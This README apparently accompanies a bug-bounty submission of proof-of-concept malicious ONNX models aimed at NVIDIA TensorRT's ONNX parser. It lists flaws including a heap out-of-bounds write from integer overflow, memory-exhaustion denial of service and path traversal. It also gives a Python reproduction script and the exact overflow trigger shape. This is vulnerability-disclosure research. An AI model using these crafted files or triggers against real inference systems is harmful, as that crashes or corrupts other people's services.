| --- |
| tags: |
| - security |
| - proof-of-concept |
| license: apache-2.0 |
| --- |
| |
| # TensorRT ONNX Parser - Security PoC Models |
|
|
| Bug bounty research submission to huntr.com targeting NVIDIA TensorRT ONNX parser. |
|
|
| ## Vulnerabilities |
|
|
| | File | Vulnerability | CWE | Severity | |
| |------|--------------|-----|----------| |
| | `eyelike_overflow.onnx` | Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical | |
| | `eyelike_small_overflow.onnx` | Same bug, faster crash trigger | CWE-190, CWE-122 | Critical | |
| | `external_oom_length.onnx` | Uncapped length field -> OOM denial of service | CWE-770 | High | |
| | `external_abs_path.onnx` | Absolute path traversal bypass in external weights | CWE-22 | Medium | |
| | `external_neg_offset.onnx` | Negative seek offset in external weights | CWE-20 | Medium | |
| | `external_oob_offset.onnx` | Read past EOF - uninitialized buffer risk | CWE-125 | Medium | |
|
|
| ## Reproduce (Finding 1 - Heap OOB Write) |
|
|
| ```python |
| import tensorrt as trt |
| |
| logger = trt.Logger(trt.Logger.VERBOSE) |
| builder = trt.Builder(logger) |
| network = builder.create_network( |
| 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)) |
| parser = trt.OnnxParser(network, logger) |
| |
| with open("eyelike_overflow.onnx", "rb") as f: |
| parser.parse(f.read()) |
| # Expected: SIGSEGV / heap-buffer-overflow |
| ``` |
|
|
| ## Root Cause (Finding 1) |
|
|
| ```cpp |
| // onnxOpImporters.cpp - EyeLike importer |
| int totalWeights = dims.d[0] * dims.d[1]; // int32 overflow! dims are int64_t |
| std::vector<int> values(totalWeights); // undersized allocation |
| for (int32_t r = 0; r < dims.d[0]; ++r) |
| for (int32_t c = 0; c < dims.d[1]; ++c) |
| values[r * dims.d[1] + c] = 0; // OOB WRITE |
| ``` |
|
|
| Trigger: input shape `[65537, 65536]` |
| - True product: 4,295,032,832 (overflows int32) |
| - int32 truncated: 65,536 (vector too small) |
| - First OOB write: r=1, c=0 -> index 65,536 |
|
|